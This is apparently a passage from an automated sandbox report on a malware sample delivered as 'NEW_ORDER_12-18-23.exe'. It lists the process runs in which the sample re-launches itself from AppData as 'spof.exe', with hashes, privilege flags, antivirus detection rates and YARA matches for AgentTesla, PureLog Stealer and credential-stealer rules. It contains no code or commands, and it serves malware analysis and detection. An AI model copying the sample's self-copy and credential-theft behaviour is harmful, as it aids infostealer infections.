                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:14:31:07
                                        Start date:18/12/2023
                                        Path:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        Imagebase:0x2162d040000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:14:31:17
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\AppData\Roaming\spof.exe"
                                        Imagebase:0x22247e80000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1903558795.000002225BA12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1903558795.000002225BB82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1903558795.000002225BB82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1903558795.000002225B8BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 27%, ReversingLabs
                                        • Detection: 35%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x13b99a40000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x1b273d20000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x17e96c90000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x2acd4e00000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x1c9fccf0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x28057800000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x21252a40000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:20
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x256af0e0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:21
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x271ac790000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:22
                                        Start time:14:31:22
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x1aee3730000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:25
                                        Start time:14:31:25
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\AppData\Roaming\spof.exe"
                                        Imagebase:0x12b08940000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.1968348865.0000012B1C5A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.1965677845.0000012B0AADC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1965677845.0000012B0AADC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.1968348865.0000012B1C552000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.1968348865.0000012B1C44A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:26
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x2035f4d0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:27
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x25417a40000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:28
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x160dbd00000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:29
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x24b197b0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:30
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x21b3bba0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:31
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x220c0c50000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:32
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x1c7371c0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:33
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x263091b0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:34
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x22455640000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:35
                                        Start time:14:31:28
                                        Start date:18/12/2023
                                        Path:C:\Users\user\AppData\Roaming\spof.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\spof.exe
                                        Imagebase:0x1a084ea0000
                                        File size:17'408 bytes
                                        MD5 hash:70FAC030623DEB6181201FD0CA321BB4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        Reset < >